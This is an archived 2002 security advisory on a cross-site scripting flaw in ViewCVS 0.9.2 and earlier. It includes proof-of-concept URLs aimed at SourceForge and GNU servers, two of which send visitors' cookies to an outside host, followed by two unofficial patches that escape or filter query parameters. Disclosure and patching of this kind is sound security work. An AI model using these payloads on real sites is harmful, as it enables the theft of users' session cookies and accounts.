21th May 2002 [SBWID-5353]
COMMAND
ViewCVS cross-site scripting bug
SYSTEMS AFFECTED
ViewCVS 0.9.2 and below
PROBLEM
office [http://www.office.ac/] says :
ViewCVS is a WWW interface for CVS Repositories. It is widely used in
freesoft community and open source community. Unfortunately, it has the
vulnerability of cross-site scripting.
Proof
-----
If you access to the URL like;
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert(\"he
llo\")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><scri
pt>alert(\"hello\")</script>
The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not
valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP.
And these URL can do is only showing a popup window appearing.
Example
-------
For example, you can see the vulnerability at the SourceForge.net
(Vendor\'s site is on SourceForge.net).
If you access to the sample URL following, your cookie (including your
login information and session information about SourceForge.net) is
stolen by my site (http://www.office.ac)
The stolen cookie\'s information of Internet Explorer 6.0 includes your
login information and session information about SourceForge.net. But
the stolen cookie\'s information of Opera 6.01 and mozilla 0.9.9
includes only user name, and the cookie information of Netscape 4.78
and 6.2.2 is nothing. (I don\'t know why.)
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>a
lert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen
%20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi?\'%2Bdocumen
t.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=re
v\"><script>alert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%2
0is%20stolen%20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi
?\'%2Bdocument.cookie);</script>
The ViewCVS at SourceForge.net is not newest version. And you can see
the vulnerability of newest version of ViewCVS at GNU.
http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert(\"hello\"
)</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev\"
><script>alert(\"hello\")</script>
SOLUTION
No official patch yet, check UNofficial ones below :
Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System
Project (http://www.h14m.org/).
--- viewcvs.py.orig Fri Dec 14 23:14:39 2001
+++ viewcvs.py Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
# parse the query params into a dictionary (and use defaults)
query_dict = default_settings.copy()
for name, values in cgi.parse().items():
- query_dict[name] = values[0]
+ query_dict[name] = cgi.escape(values[0])
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
This code comes from Taku YASUI <tach@sourceforge.jp> /
Sourceforge.jp (http://sourceforge.jp/) who has offered former patch to
the ViewCVS team.
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107
+++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108
@@ -180,8 +180,14 @@
# parse the query params into a dictionary (and use defaults)
query_dict =3D default_settings.copy()
+
+ # RE that ViewCVS doesn\'t use in any URL, but a CSS attack might
+ re_url_validate =3D re.compile(\'\\\'|\"|<|>\')
for name, values in cgi.parse().items():
- query_dict[name] =3D values[0]
+ # do not accept values that contain non-ViewCVS characters
+ # except for search
+ if not re.search(re_url_validate, values[0]) or name =3D=3D \'search\'=
:
+ query_dict[name] =3D values[0]
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
